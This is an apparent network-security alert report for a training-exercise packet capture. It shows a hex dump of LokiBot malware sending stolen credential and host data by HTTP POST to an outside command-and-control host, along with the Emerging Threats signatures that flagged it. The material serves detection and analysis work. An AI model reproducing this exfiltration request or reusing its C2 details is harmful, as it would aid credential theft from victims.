
LokiBot Application/Credential Data Exfiltration Detected M2 detected in 2017-11-21-traffic-analysis-exercise-2-of-6.pcap

Time:        2017/11/21 00:13:59 +0000
Packet:      15198
Protocol:    HTTP / tcp
Source:      10.192.1.157:49288
Destination: 185.118.166.155:80

Payload (476 bytes)

00000000  50 4f 53 54 20 2f 77 70  2d 61 64 6d 69 6e 2f 63  |POST /wp-admin/c|
00000010  73 73 2f 63 6f 6c 6f 72  73 2f 62 6c 75 65 2f 50  |ss/colors/blue/P|
00000020  61 6e 65 6c 2f 66 69 76  65 2f 66 72 65 2e 70 68  |anel/five/fre.ph|
00000030  70 20 48 54 54 50 2f 31  2e 30 0d 0a 55 73 65 72  |p HTTP/1.0..User|
00000040  2d 41 67 65 6e 74 3a 20  4d 6f 7a 69 6c 6c 61 2f  |-Agent: Mozilla/|
00000050  34 2e 30 38 20 28 43 68  61 72 6f 6e 3b 20 49 6e  |4.08 (Charon; In|
00000060  66 65 72 6e 6f 29 0d 0a  48 6f 73 74 3a 20 74 63  |ferno)..Host: tc|
00000070  6f 6f 6c 6f 6e 6c 69 6e  65 2e 6d 6f 62 69 0d 0a  |oolonline.mobi..|
00000080  41 63 63 65 70 74 3a 20  2a 2f 2a 0d 0a 43 6f 6e  |Accept: */*..Con|
00000090  74 65 6e 74 2d 54 79 70  65 3a 20 61 70 70 6c 69  |tent-Type: appli|
000000A0  63 61 74 69 6f 6e 2f 6f  63 74 65 74 2d 73 74 72  |cation/octet-str|
000000B0  65 61 6d 0d 0a 43 6f 6e  74 65 6e 74 2d 45 6e 63  |eam..Content-Enc|
000000C0  6f 64 69 6e 67 3a 20 62  69 6e 61 72 79 0d 0a 43  |oding: binary..C|
000000D0  6f 6e 74 65 6e 74 2d 4b  65 79 3a 20 45 41 30 35  |ontent-Key: EA05|
000000E0  35 37 36 34 0d 0a 43 6f  6e 74 65 6e 74 2d 4c 65  |5764..Content-Le|
000000F0  6e 67 74 68 3a 20 32 30  34 0d 0a 43 6f 6e 6e 65  |ngth: 204..Conne|
00000100  63 74 69 6f 6e 3a 20 63  6c 6f 73 65 0d 0a 0d 0a  |ction: close....|
00000110  12 00 27 00 00 00 07 00  00 00 63 6b 61 76 2e 72  |..'.......ckav.r|
00000120  75 01 00 1a 00 00 00 68  00 65 00 6e 00 72 00 79  |u......h.e.n.r.y|
00000130  00 2e 00 6a 00 6f 00 68  00 6e 00 73 00 6f 00 6e  |...j.o.h.n.s.o.n|
00000140  00 01 00 14 00 00 00 57  00 49 00 4e 00 2d 00 44  |.......W.I.N.-.D|
00000150  00 35 00 32 00 34 00 33  00 42 00 01 00 14 00 00  |.5.2.4.3.B......|
00000160  00 57 00 49 00 4e 00 2d  00 44 00 35 00 32 00 34  |.W.I.N.-.D.5.2.4|
00000170  00 33 00 42 00 00 05 00  00 d0 02 00 00 01 00 00  |.3.B............|
00000180  00 00 00 06 00 01 00 01  00 6b 00 00 00 01 00 00  |.........k......|
00000190  00 00 00 00 00 00 00 00  00 01 00 30 00 00 00 34  |...........0...4|
000001A0  00 46 00 45 00 42 00 38  00 43 00 39 00 43 00 37  |.F.E.B.8.C.9.C.7|
000001B0  00 32 00 33 00 38 00 37  00 35 00 37 00 31 00 42  |.2.3.8.7.5.7.1.B|
000001C0  00 41 00 42 00 30 00 44  00 44 00 36 00 46 00 05  |.A.B.0.D.D.6.F..|
000001D0  00 00 00 6a 65 35 65 6f  00 00 00 00              |...je5eo....|

2 Alerts

Alerts provided by Emerging Threats 2022-04-08
Signature | Category | SID.rev | Rule Set
1 LokiBot Application/Credential Data Exfiltration Detected M2 | A Network Trojan was detected | 2024317.3 | ET MALWARE
1 LokiBot Application/Credential Data Exfiltration Detected M1 | A Network Trojan was detected | 2024312.3 | ET MALWARE

External References

There are no references available for these alerts.

Community ID

Community ID is an open standard for hashing network flows into identifiers and can be used to correlate connections across different tools.

Zeek: conn.log: 1:AuNn9vwZBdd/aoP9f7+UlmtGdUY=